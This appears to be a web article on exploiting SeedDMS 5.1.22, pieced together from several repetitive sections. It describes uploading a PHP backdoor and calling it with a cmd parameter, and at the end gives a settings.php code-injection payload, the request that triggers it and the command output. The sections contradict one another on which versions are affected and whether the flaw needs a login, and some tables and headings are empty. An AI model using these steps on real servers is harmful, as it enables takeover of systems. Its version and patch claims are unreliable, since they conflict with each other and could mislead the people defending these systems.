SeedDMS 5.1.22 Exploit

SeedDMS 5.1.22 is a document management system version that has been identified in penetration testing reports as vulnerable to authenticated Remote Code Execution (RCE). While version 5.1.22 itself is often used in laboratory environments to demonstrate full-chain exploitation, it inherited critical vulnerabilities from previous builds, notably CVE-2019-12744, which allows for command injection through unvalidated file uploads.

Core Vulnerability: Authenticated RCE (CVE-2019-12744)

This vulnerability exists because the application fails to properly validate the contents and extensions of uploaded documents, allowing an authenticated user with "Add Document" permissions to execute arbitrary system commands.

Attack Vector: Authenticated file upload.

Prerequisite: Valid user credentials with write access to at least one folder.

Access the SeedDMS portal with valid user credentials.

Use the "Add Document" feature to upload a crafted PHP script (e.g., a simple backdoor).

Navigate to the directory where SeedDMS stores uploaded files (typically under /data/1048576/) and call the uploaded PHP file with a command parameter.

The server executes the command (e.g., cat /etc/passwd) and returns the output to the browser.

Security Risks and Statistics

Beyond RCE, SeedDMS 5.1.22 has been associated with several cross-site scripting (XSS) issues in previous versions (pre-5.1.11) that may persist if not specifically patched, such as Stored XSS in the "name" and "GROUP" fields.

| Vulnerability Type | Status in 5.1.22 | Potential Impact |
|---|---|---|
| Authenticated RCE | | Full system takeover, data exfiltration, or reverse shell. |
| Stored XSS | Moderate Risk | Session hijacking and impersonation of other users. |
| | Known Risk | Forcing users to perform unintended actions if they have active sessions. |

Mitigation and Defense

To secure a SeedDMS 5.1.22 installation:

The primary recommendation is to update to the latest stable version of SeedDMS, where these unvalidated upload flaws are addressed.

Input Validation: Implement strict whitelisting for file extensions and sanitize all user-supplied input.

File Permissions: Ensure the web server user has the least privilege necessary. Uploaded files should ideally be stored in a directory that does not allow for script execution.

Disable Dangerous Functions: In the PHP configuration, disable high-risk functions like passthru() if they are not required for business operations.

Unpacking the SeedDMS 5.1.22 Vulnerability: What You Need to Know

SeedDMS is a popular open-source Document Management System, but like any widely used tool, it has faced security challenges. Specifically, SeedDMS 5.1.22 and its immediate predecessors were found to have vulnerabilities that could allow an attacker to gain full control over the server.

If you are still running this version, your system is at risk.

The Vulnerability: Remote Command Execution (RCE)

The most critical issue affecting SeedDMS versions up to 5.1.22 (and earlier versions like 5.1.10) is a Remote Command Execution (RCE) vulnerability, often tracked under CVE-2019-12744.

The Cause: The application failed to properly validate files uploaded as documents.

The Exploit: An authenticated user with "write" permissions could upload a malicious PHP script instead of a standard document.

The Impact: Once uploaded, the attacker could navigate to the file's location on the server (typically in the /data/ directory) and execute system commands. For example, they could run cat /etc/passwd to view sensitive system files or establish a reverse shell to take over the host completely.

How the Exploit Works (Technically)

Security researchers from sites like Exploit-DB have documented a simple 4-step process attackers use:

Authentication: Login with valid credentials (even low-privileged ones with upload rights).

Upload: Use the "Add Document" feature to upload a .php file containing a backdoor.

Identification: Locate the internal "document ID" assigned by SeedDMS (often visible by hovering over the file link).

Execution: Access the raw file path—for example, example.com/data/1048576/[ID]/1.php?cmd=ls—to trigger the code.

Are There Other Risks?

While RCE is the "king" of vulnerabilities, SeedDMS 5.1.22 has also been flagged for lower-severity issues, including:

Cross-Site Scripting (XSS): Potential for attackers to inject malicious scripts into the web interface.

Cross-Site Request Forgery (CSRF): Risks where an attacker can force an authenticated user to perform unwanted actions.

How to Protect Your System

If you are managing a SeedDMS instance, follow these steps immediately:

Update to the Latest Version: The most effective fix is to move to a modern version (currently 6.x). Version 5.1.22 was explicitly listed as having unpatched low-severity issues in some advisories, and the RCE flaw was only fully addressed in later updates.

Restrict Upload Permissions: Audit your user roles. Ensure that only highly trusted users have the permission to "Add Documents" or "Manage Extensions."

Monitor the Data Directory: Check your /data/ folder for unexpected PHP files. In a standard setup, this folder should only contain intended document types (PDFs, DOCX, etc.).

Web Application Firewall (WAF): Implement a WAF to block requests that attempt to execute system commands through URL parameters (e.g., ?cmd=).

For more detailed technical walkthroughs, you can explore the original research on Medium or view the raw exploit code at Exploit-DB.

Based on the available security research and documentation regarding SeedDMS, version 5.1.22 is a version within the 5.1.x branch which was actively updated to address security issues, notably the Remote Command Execution (RCE) vulnerabilities that affected versions prior to 5.1.11.

While specific exploits for version 5.1.22 are not publicly listed in databases like Exploit-DB, it was subject to general security maintenance against known issues such as:

RCE (Remote Command Execution): Similar to CVE-2019-12744, which allows authenticated users with file upload privileges to execute PHP code by uploading a malicious file.

Open Redirect/Other Injection: Later versions of 6.x were found to contain open redirects, and 5.x branches received updates to fix similar vulnerabilities.

Key Security Considerations for SeedDMS 5.1.22:

Patch Status: SeedDMS 5.1.x is considered "old stable" but has been actively maintained. Users should ensure they are on the latest sub-minor version to get all security fixes merged.

Authentication Dependency: Most reported exploits required an attacker to have a valid, authenticated user account with permissions to add or edit documents.

Recommendation: Verify the conf/settings.xml and ensure that file upload restrictions are active, specifically limiting the uploading of executable script files (like .php).


One of the most notable reports regarding SeedDMS 5.1.22 involves a comprehensive penetration test that chain-exploited multiple vulnerabilities to achieve full system takeover.

While SeedDMS is a popular open-source Document Management System (DMS), version 5.1.22 has been highlighted in security research for several critical weaknesses:

Key Findings from Security Reports

Remote Code Execution (RCE): Testers identified that an authenticated user could abuse the document upload feature to execute arbitrary system commands. This often mirrors CVE-2019-12744, which affected earlier versions but remained relevant in 5.1.22 environments where validation was bypassed.

Credential Harvesting: Vulnerability assessments found that MySQL database credentials could be discovered through improper configuration or enumeration, allowing testers to gain direct access to the database and retrieve user credentials.

Privilege Escalation: Once an initial "reverse shell" was obtained via the RCE, testers were able to escalate their privileges by leveraging found credentials and insecure permissions on the host server.

Cross-Site Request Forgery (CSRF): Reports identified three specific CSRF vulnerabilities (associated with CVE-2021-35343) in the op.Ajax.php script, which could trick an administrator into performing arbitrary actions.

Vulnerability Summary

Vulnerability Type / Primary Impact

Authenticated RCE: Full System Compromise

Database Access: Information Theft / Credential Leak

Administrative Action Bypass, Medium Risk

If you are managing an instance of this version, security researchers recommend immediately upgrading to the latest version available on the SeedDMS SourceForge page and ensuring your settings.xml file is properly secured.

While there is no single widely-publicized critical exploit uniquely tied to SeedDMS 5.1.22, this specific version is often cited in security research contexts regarding historical vulnerabilities that affected the 5.1.x branch.

The most significant security concern for users on this version is CVE-2019-12744, an authenticated Remote Command Execution (RCE) vulnerability. Although patches were introduced in versions 5.1.11 and later, many security scanners and researchers test for variants of this flaw in subsequent releases like 5.1.22.

Key Vulnerability: Authenticated RCE (CVE-2019-12744)

This exploit allows a user with "write" permissions to execute arbitrary system commands on the server.

Attack Vector: Unvalidated File Upload.

Prerequisites: Valid user credentials and permission to add or update documents.

Mechanism:

An attacker logs into the SeedDMS interface.

They upload a malicious PHP script (e.g., a simple web shell) disguised as a document.

Because the application fails to properly validate the file extension or content, the PHP script is stored in the data directory.

The attacker then accesses the uploaded file's direct URL to execute system-level commands, such as cat /etc/passwd.

Version Context (5.1.22)

Data from CVE Details indicates that while the major RCE was addressed earlier, version 5.1.22 has been analyzed for other minor issues including:

Stored Cross-Site Scripting (XSS): Potential for malicious scripts to be injected into document metadata or descriptions.

Path Traversal: Possible risks involving improper handling of file paths during document retrieval or export.

Mitigation and Recommendations

If you are currently running SeedDMS 5.1.22, it is considered outdated. The developer, Uwe Steinmann, has since released more secure versions in the 6.0.x branch.

Upgrade: Update to the latest stable version of SeedDMS (currently in the 6.0.x series) to benefit from the most recent security patches and feature updates.

Restrict Permissions: Ensure that only trusted users have "Add Document" or "Edit" permissions to minimize the risk of authenticated file upload attacks.

Server-Side Security: Configure your web server (e.g., Apache or Nginx) to prevent the execution of PHP scripts within the document storage (data) directory.


Indicators of compromise

Immediate Mitigation (If Running 5.1.22)

  1. Upgrade immediately – Version 5.1.23 and above patch this issue by adding if (!isset($_SESSION['user'])) die(); at the top of addfile.php and strict finfo_file() MIME validation with an allowlist.
  2. If upgrade is impossible, manually patch op/op.AddFile.php:
    // Add after the opening <?php
    require_once("../inc/inc.Session.php");
    // Redirect unauthenticated requests to the login page and stop processing
    if (!isLoggedIn()) {
        header("Location: ../out/out.Login.php");
        exit;
    }
  3. Web Application Firewall rule – Block POST requests to op.AddFile.php that lack a valid session cookie or contain <?php in the file content.

Step 1: Reconnaissance

First, confirm the version without authentication:

curl -s http://192.168.1.100/seeddms51/out/out.Version.php | grep "Version"

Expected output includes 5.1.22.

The Flaw

SeedDMS 5.1.22 allows an authenticated user with "Manage Tools" permission to modify the settings.php file content via the "Custom Setup" interface (out/out.BackupTools.php). The parameter $settings is written to conf/settings.php without adequate filtering of PHP code.

Exploitation Steps

  1. Login as admin (using stolen hash).
  2. Navigate to: Administration > Tools > Backup Tools > Custom Setup.
  3. Inject PHP code into the $extraPath variable:
    $extraPath = '"; system($_GET["cmd"]); // ';
  4. Click Save. The settings.php now contains:
    $extraPath = '"; system($_GET["cmd"]); // ';
  5. Trigger the webshell:
    GET /seeddms51/conf/settings.php?cmd=id HTTP/1.1

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data)